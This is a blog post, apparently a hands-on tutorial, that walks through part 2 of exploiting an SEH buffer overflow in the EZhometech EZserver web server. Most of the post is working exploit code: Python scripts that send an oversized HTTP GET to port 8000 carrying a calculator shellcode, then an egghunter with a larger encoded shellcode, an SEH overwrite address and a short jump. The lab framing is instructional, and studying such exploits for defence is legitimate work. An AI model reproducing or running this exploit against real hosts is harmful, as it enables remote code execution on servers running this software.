♋...Learn Harder, Keep Humble, Not For The Fain Heart !, Respect Others, Try Harder...♋

Wednesday, October 3, 2012

Exploit EZhometech EZserver (SEH Buffer Overflow) Part.2

In this part, I will continue the step and found the solution from the previous case namely failed to telnet because the memory space is small, so the payload failed to landing.
See picture below :

On above showing, size the space memory is 236 byte, while size the shellcode is 344 bytes. Sure not enough to landing the shellcode. Therefore I need using egghunter method.

- Next test the fuzzer.
Before, I want to test the fuzzer is correct or wrong, in here I using shellcode calculator. You can get it from Metasploit. The shellcode like below :


"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x59"
"\x90\x14\x8c\x83\xeb\xfc\xe2\xf4\xa5\x78\x50\x8c\x59\x90\x9f\xc9"
"\x65\x1b\x68\x89\x21\x91\xfb\x07\x16\x88\x9f\xd3\x79\x91\xff\xc5"
"\xd2\xa4\x9f\x8d\xb7\xa1\xd4\x15\xf5\x14\xd4\xf8\x5e\x51\xde\x81"
"\x58\x52\xff\x78\x62\xc4\x30\x88\x2c\x75\x9f\xd3\x7d\x91\xff\xea"
"\xd2\x9c\x5f\x07\x06\x8c\x15\x67\xd2\x8c\x9f\x8d\xb2\x19\x48\xa8"
"\x5d\x53\x25\x4c\x3d\x1b\x54\xbc\xdc\x50\x6c\x80\xd2\xd0\x18\x07"
"\x29\x8c\xb9\x07\x31\x98\xff\x85\xd2\x10\xa4\x8c\x59\x90\x9f\xe4"
"\x65\xcf\x25\x7a\x39\xc6\x9d\x74\xda\x50\x6f\xdc\x31\x60\x9e\x88"
"\x06\xf8\x8c\x72\xd3\x9e\x43\x73\xbe\xf3\x75\xe0\x3a\x90\x14\x8c"


Enter on fuzzer :

#!/usr/bin/python
import socket
ip_address="192.168.56.101"
port=8000
buffer ="\x90" * 5879
buffer+="\xeb\x06\x90\x90"
buffer+="\x96\x96\x20\x10"
buffer+="\x90" * 16
buffer+=("\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x59"
"\x90\x14\x8c\x83\xeb\xfc\xe2\xf4\xa5\x78\x50\x8c\x59\x90\x9f\xc9"
"\x65\x1b\x68\x89\x21\x91\xfb\x07\x16\x88\x9f\xd3\x79\x91\xff\xc5"
"\xd2\xa4\x9f\x8d\xb7\xa1\xd4\x15\xf5\x14\xd4\xf8\x5e\x51\xde\x81"
"\x58\x52\xff\x78\x62\xc4\x30\x88\x2c\x75\x9f\xd3\x7d\x91\xff\xea"
"\xd2\x9c\x5f\x07\x06\x8c\x15\x67\xd2\x8c\x9f\x8d\xb2\x19\x48\xa8"
"\x5d\x53\x25\x4c\x3d\x1b\x54\xbc\xdc\x50\x6c\x80\xd2\xd0\x18\x07"
"\x29\x8c\xb9\x07\x31\x98\xff\x85\xd2\x10\xa4\x8c\x59\x90\x9f\xe4"
"\x65\xcf\x25\x7a\x39\xc6\x9d\x74\xda\x50\x6f\xdc\x31\x60\x9e\x88"
"\x06\xf8\x8c\x72\xd3\x9e\x43\x73\xbe\xf3\x75\xe0\x3a\x90\x14\x8c")
buffer+="\x90" * (5954 -len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((ip_address,port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Sending Fuzzer . . . !")
sock.close(

Open application and then run the fuzzer, see what happen ?

See on above, the shellcode access the windows and running calculator. Mean , our fuzzer and count is correct.

- Afterthat, now is time to using egghunter method
The description of egghunter is :
{NOP + w00tw00t + shellcode + Break (NOP1) + JMP SHORT + Address of .dll + Break (NOP2) + hunt}

#!/usr/bin/python
import socket
ip_address="192.168.56.101"
port=8000
hunt =("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74"
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
buffer ="\x90" * 5447

shellcode=("\x31\xc9\xb1\x51\xda\xd4\xba\xcc\xd6\xc2\x2c\xd9\x74\x24\xf4\x58"
"\x31\x50\x13\x83\xc0\x04\x03\x9c\xd9\x20\xd9\xe0\x8c\x4f\x6f\xf0"
"\xa8\x6f\x8f\xff\x2b\x1b\x1c\xdb\x8f\x90\x98\x1f\x5b\xda\x27\x27"
"\x5a\xcc\xa3\x98\x44\x99\xeb\x06\x74\x76\x5a\xcd\x42\x03\x5c\x3f"
"\x9b\xd3\xc6\x13\x58\x13\x8c\x6c\xa0\x5e\x60\x73\xe0\xb4\x8f\x48"
"\xb0\x6e\x58\xdb\xdd\xe4\xc7\x07\x1f\x10\x91\xcc\x13\xad\xd5\x8d"
"\x37\x30\x01\x32\x64\xb9\x5c\x58\x50\xa1\x3f\x63\xa9\x02\xdb\xe8"
"\x89\x84\xaf\xae\x01\x6e\xdf\x32\xb7\xfb\x60\x42\x99\x93\xee\x1c"
"\x2b\x88\xbf\x5f\xe5\x36\x13\xf9\x62\x84\xa1\x6d\x04\x99\xf7\x32"
"\xbe\xa2\x28\xa4\xf5\xb0\x35\x0f\x5a\xb4\x10\x30\xd3\xaf\xfb\x4f"
"\x0e\x27\x06\x1a\xbb\x3a\xf9\x74\x53\xe2\x0c\x81\x09\x43\xf0\xbf"
"\x01\x3f\x5d\x6c\xf5\xfc\x32\xd1\xaa\xfd\x65\xb3\x24\x13\xda\x5d"
"\xe6\x9a\x03\x34\x60\x39\xd9\x46\xb6\x16\x21\x70\x52\x89\x8c\x29"
"\x5c\x79\x46\x75\x0f\x54\x7e\x22\xaf\x7f\xd3\x99\xb0\x50\xbc\xc4"
"\x06\xd7\x74\x51\x66\x01\xd6\x09\xcc\xfb\x28\x61\x7f\x6b\x30\xf8"
"\x46\x15\xe9\x05\x90\xb3\xea\x29\x7b\x56\x71\xaf\xec\xc5\x14\xa6"
"\x08\x63\xb7\xe1\xfb\xb8\xbe\xf6\x96\x04\x48\x1a\x57\x45\xb9\x70"
"\x66\x07\x13\x7a\xd5\xa4\xf8\x0f\xa0\x8c\x55\xa4\xfe\x85\xdb\x44"
"\xb3\x40\xe3\xcd\xf0\x93\xcd\x76\xae\x39\xa3\xd9\x01\xd4\x42\x88"
"\xf0\x7d\x14\xd5\x23\x15\x3b\xf0\xc1\x28\x10\xfd\x1c\xde\x68\xfe"
"\x96\xe0\x47\x8b\x8e\xe2\xeb\x4f\x54\xe4\x3a\x1d\x6a\xca\xab\xdf"
"\x4c\x09\x58\x4c\x92\x18\x60\xa2")
buffer+="w00tw00t"
buffer+=shellcode
buffer+="\x90" * 80 #break
buffer+="\xeb\x06\x90\x90" #JMP SHORT
buffer+="\x96\x96\x20\x10" #Overwrite address of MSVCRTD.dll
buffer+="\x90" * 32 #break
buffer+=hunt
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((ip_address,port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Sending Fuzzer . . . !")
sock.close()

And then......


Done



Diposkan oleh di
Label:

1 comment:

  1. AnonymousApril 19, 2015 at 3:47 AM

    I Need Help Here
    Mail=nertilalba@gmail.com

    ReplyDelete

Subscribe to: Post Comments (Atom)